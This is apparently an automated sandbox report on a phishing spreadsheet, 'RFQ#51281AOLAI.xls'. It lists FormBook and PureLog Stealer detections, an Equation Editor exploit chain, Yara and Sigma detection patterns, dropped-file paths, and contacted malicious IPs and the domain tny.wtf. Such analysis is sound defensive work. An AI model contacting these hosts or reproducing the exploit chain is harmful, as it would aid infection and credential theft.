Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ#51281AOLAI.xls

Overview

General Information

Sample name:RFQ#51281AOLAI.xls
Analysis ID:1482907
MD5:6a2cb319332d2a0e586a3d1486af5c5a
SHA1:1940ec2ffeb4676a56ac584567c419c31857bd61
SHA256:3f341c20d06b4099461e0da9ced7d2e3d599e447d0acdf10b9a7d4a9e30d4440
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2504 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 652 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3044 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • winiti.exe (PID: 3080 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
      • winiti.exe (PID: 3120 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1804222C.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1447f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.443827967.0000000000680000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Click to see the 1 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.winiti.exe.680000.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          9.2.winiti.exe.680000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            9.2.winiti.exe.26e505c.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              10.2.winiti.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                10.2.winiti.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
                • 0x2de33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
                • 0x168e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
                Click to see the 3 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.219.239.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3044, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3044, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe

                System Summary

                barindex
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3044, Protocol: tcp, SourceIp: 104.219.239.104, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2504, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3080, ProcessName: winiti.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2504, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3080, ProcessName: winiti.exe
                Sigma detected: Excel Network Connections
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2504, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Sigma detected: Suspicious Office Outbound Connections
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2504, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 652, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-26T11:07:21.237346+0200
                SID:2022050
                Source Port:80
                Destination Port:49166
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T11:07:21.335839+0200
                SID:2022051
                Source Port:80
                Destination Port:49166
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1804222C.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Multi AV Scanner detection for domain / URL
                Source: tny.wtfVirustotal: Detection: 5%Perma Link
                Source: http://tny.wtf/Virustotal: Detection: 5%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeVirustotal: Detection: 48%Perma Link
                Source: C:\Users\user\AppData\Roaming\winiti.exeVirustotal: Detection: 48%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\winiti.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: RFQ#51281AOLAI.xlsJoe Sandbox ML: detected

                Exploits

                barindex
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.219.239.104 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exeJump to behavior
                Source: ~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmp.4.drStream path '_1783475591/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmp.4.drStream path '_1783475595/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmp.4.drStream path '_1783475616/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmp.4.drStream path '_1783475617/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmp.4.drStream path '_1783475620/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: amWV.pdb source: winiti.exe, 00000009.00000000.440872955.00000000011D2000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.8.dr, winiti[1].exe.8.dr
                Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000009.00000000.440872955.00000000011D2000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.8.dr, winiti[1].exe.8.dr
                Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficDNS query: name: tny.wtf
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
